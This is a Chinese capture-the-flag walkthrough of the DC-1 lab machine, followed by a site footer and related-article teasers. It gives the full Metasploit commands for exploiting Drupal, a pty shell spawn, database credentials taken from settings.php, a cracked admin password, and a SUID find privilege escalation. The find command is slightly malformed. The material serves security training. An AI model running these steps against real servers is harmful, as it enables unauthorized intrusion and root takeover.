靶机 DC_1

DC_1

信息搜集

存活检测

image-20231022135843731

详细扫描

网页目录扫描

image-20231022142423026

网页信息搜集

  • cms 为 Drupal

    image-20231022140031062

    image-20231022140204611

    image-20231022140211818

漏洞利用

  • 使用 msf 搜索 drupal 的漏洞

    启动

    msfconsole
    

    搜索

    search drupal
    

    image-20231022142917455

  • 尝试编号为 0 的漏洞

    image-20231022143602280

    失败

  • 利用编号为 1 的漏洞

    use 1
    

    查看需要配置的选项

    show options
    

    image-20231022143040490

    设置目标 ip

    set rhost 10.4.7.145
    

    启动

    run
    
  • 成功建立连接

    image-20231022143806965

  • 获取 shell 权限

    shell
    

    image-20231022143918234

  • 回显提示符

    python -c 'import pty;pty.spawn("/bin/bash")'
    

    image-20231022143959796

  • 第一个 flag

    image-20231022144047189

  • 查看 drupal 默认配置文件

    路径

    /var/www/sites/default
    
    cat settings.php
    

    image-20231022145527644

数据库登录

  • 在 drupal 配置文件中查找到了第二个 flag 以及数据库的账密信息

    用户名:dbuser
    密码:R0ck3t
    

    image-20231022145625466

  • 成功登录数据库

    image-20231022145936963

  • 搜集有用信息

    image-20231022150028752

  • 查看 users 表

    image-20231022150654792

  • md5 解密

    密码为 53cr3t

    image-20231022150630553

  • admin 登录

    image-20231022150746661

    在 content 目录下拿到第三个 flag

    image-20231022150828508

  • 提示 perms find -exec

提权

  • 查找具有 suid 权限的命令

    具有 suid 权限的命令在使用时会以命令所有者的权限运行

    命令的所有者一般为 root

    find / -perm -4000 2>/dev/null
    

    image-20231022151340602

  • find 提权

    find \ a -exec 'bash' \;
    

    image-20231022151648735

  • bash 提权失败,尝试使用 sh

    image-20231022151804911

    成功 root

  • final flag

    image-20231022152402407

总结

  • Metasploit 漏洞利用
  • find 提权

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/115304.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

监控易101:全方位解读运维的核心功能与特性

在数字化时代,企业IT环境的复杂性日益增加,给运维工作带来了前所未有的挑战。面对这一情况,监控易作为一款一体化运维监控管理平台,凭借其全面的监控覆盖、智能的告警机制、强大的数据分析工具以及灵活的扩展能力,赢得…

【Linxu工具】:vim使用及简单配置

朋友们、伙计们,我们又见面了,本期来给大家解读一下有关Linux工具:vim的使用,如果看完之后对你有一定的启发,那么请留下你的三连,祝大家心想事成! C 语 言 专 栏:C语言:从…

不知道怎么选CRM系统?看这篇就够了

CRM客户管理系统近年来已经从简单的客户管理软件发展成为了帮助企业运营发展的工具。它能够帮助企业优化业务流程、提高客户转化率、获得更多业绩。那么企业在选择CRM系统时有什么要点吗? 1、明确是否有自动化功能 自动化功能可以自动处理那些手动且琐碎的销售流程…

【Docker从入门到入土 4】使用Harbor搭建Docker私有仓库

私有仓库 一、Harbor简介1.1 什么是Harbor?1.2 Harbor的特性1.3 Harbor和docker registry的关系1.4 Harbor的构成1.4 Harbor 配置文件中的两类参数1.4.1 所需参数1.4.2 可选参数 二、Harbor部署2.1 部署Docker-Compose服务2.2 部署 Harbor 服务Step1 下载或上传 Harbor 安装程…

看得懂的——数据库中的“除”操作

通过一个例子来解释数据库中的“除”操作 R➗S其实就是判断关系R中X各个值的象集Y是否包含关系S中属性Y的所有值 求解步骤 第一步 找出关系R和关系S中相同的属性,即Y属性。在关系S中对Y做投影(即将Y列取出);所得结果如下&#x…

设计模式:策略模式(C#、JAVA、JavaScript、C++、Python、Go、PHP)

简介: 策略模式,它是一种行为型设计模式,它定义了算法族,分别封装起来,让它们之间可以互相替换。策略模式让算法的变化独立于使用算法的客户,降低了耦合,增加了系统的可维护性和可扩展性。 策…

Jetty Client IllegalArgumentException: Buffering capacity 2097152 exceeded

使用Jetty Http Client 接收较大数据时发生异常 Request request client.POST(api_url) .timeout(TIMEOUT, TimeUnit.SECONDS) .content(new BytesContentProvider(imageData), "image/*"); ContentResponse resp request.send(); if(resp.getStatus()200){ …

Integer和int

Integer和int 1.定义2. 区别2.1 数据类型2.2 可空性2.2.1 int的可空性2.2.2 Integer的可空性 2.3 效率和性能2.4 自动装箱和拆箱2.4.1 自动装箱2.4.2 自动拆箱2.4.3 注意事项 3. 比较 1.定义 int是Java中的一种基本数据类型,用于表示整数。它是Java语言中最常用的数…

同为科技(TOWE)机架PDU产品在IDC数据中心机房建设中的应用

当今社会互联网发展迅速, 随着带宽需求的提升, 网络的保密性、安全性的要求就越来越迫切。PDU(Power Distribution Unit) 是 PDU具备电源分配和管理功能的电源分配管理器。PDU电源插座是多有设备运行的第一道也是最为密切的部件, PDU的好坏直…

【漏洞复现】panalog日志审计系统任意用户创建漏洞和后台命令执行

漏洞描述 panalog为北京派网软件有限公司,一款流量分析,日志分析管理的一款软件。存在任意用户创建漏洞和后台命令执行漏洞,可先通过任意用户创建,然后进行后台命令执行,获取服务器权限。 免责声明 技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公…

Linux下的IMX6ULL——环境搭建与软件安装(一)

前言: 从今天开始我们就要用到IMX6ULL这块开发板进行linux的学习了,对于初学者,下载好资料、搭建好开发环境后,按照下面顺序学习即可: 先应用,再驱动,最后做项目。应用、驱动、项目这三个慢慢走…

【safetensor】介绍和基础代码

Hugging Face, EleutherAI, StabilityAI 用的多 介绍 文件形式 header,体现其特性。如果强行将pickle或者空软连接 打开,会出现报错。解决详见:debug 连接到其他教程结构和参数 安装 with pip:Copied pip install safetensors with con…

Java基础面试题知识点总结

什么是Java? Java是一种高级编程语言,由Sun Microsystems开发并于1995年首次发布。它被设计成一种通用、面向对象、并具有写一次、随处运行的特性。 Java的特点是什么? 简单易学:Java采用清晰简洁的语法,易于理解和学…

ScrapeKit 和 Swift 编写程序

以下是一个使用 ScrapeKit 和 Swift 编写的爬虫程序,用于爬取 图片。同时,我们使用了proxy 这段代码来获取代理。 import ScrapeKit ​ class PeopleImageCrawler: NSObject, ScrapeKit.Crawler {let url: URLlet proxyUrl: URL ​init(url: URL, proxy…

竞赛 深度学习人体语义分割在弹幕防遮挡上的实现 - python

文章目录 1 前言1 课题背景2 技术原理和方法2.1基本原理2.2 技术选型和方法 3 实例分割4 实现效果5 最后 1 前言 🔥 优质竞赛项目系列,今天要分享的是 🚩 深度学习人体语义分割在弹幕防遮挡上的应用 该项目较为新颖,适合作为竞…

如何使用Vue CLI进行预渲染

在Vue CLI中使用预渲染,你可以借助插件vue-cli-plugin-prerender-spa来实现。以下是使用Vue CLI进行预渲染的步骤: 1:安装Vue CLI:首先安装Vue CLI。如果没有安装,可以通过以下命令进行全局安装: npm install -g @vue/cli2:创建Vue项目:使用Vue CLI创建一个新的Vue项…

AQS是什么?AbstractQueuedSynchronizer之AQS原理及源码深度分析

文章目录 一、AQS概述1、什么是AQS2、技术解释3、基本原理4、AQS为什么这么重要 二、AQS数据结构1、AQS的结构2、ReentrantLock与AbstractQueuedSynchronizer3、AQS的state变量4、AQS的队列5、AQS的Node(1)Node的waitStatus(2)属性…

庆祝创造力和技术:2023年的1024程序员节

2023年的10月24日已经来临,这意味着我们又迎来了一年一度的程序员节。这是一个属于全球程序员社区的节日,一个庆祝创造力、创新和技术的时刻。无论你是一名职业程序员、技术爱好者,还是对编程世界感兴趣的新手,1024程序员节都是一…

STM32+2.9inch微雪墨水屏(电子纸)实现显示

本篇文章从硬件原理以及嵌入式编程等角度完整的介绍了墨水屏驱动过程,本例涉及的墨水屏为2.9inch e-Paper V2,它采用的是“微胶囊电泳显示”技术进行图像显示,其基本原理是悬浮在液体中的带电纳米粒子受到电场作用而产生迁移,从而改变显示屏各…

【C++入门到精通】哈希 (STL) _ unordered_map _ unordered_set [ C++入门 ]

阅读导航 前言一、unordered系列容器二、unordered_map1. unordered_map简介⭕函数特点 2. unordered_map接口- 构造函数- unordered_map的容量- unordered_map的迭代器- unordered_map的元素访问- unordered_map的修改操作- unordered_map的桶操作 三、unordered_set1. unorde…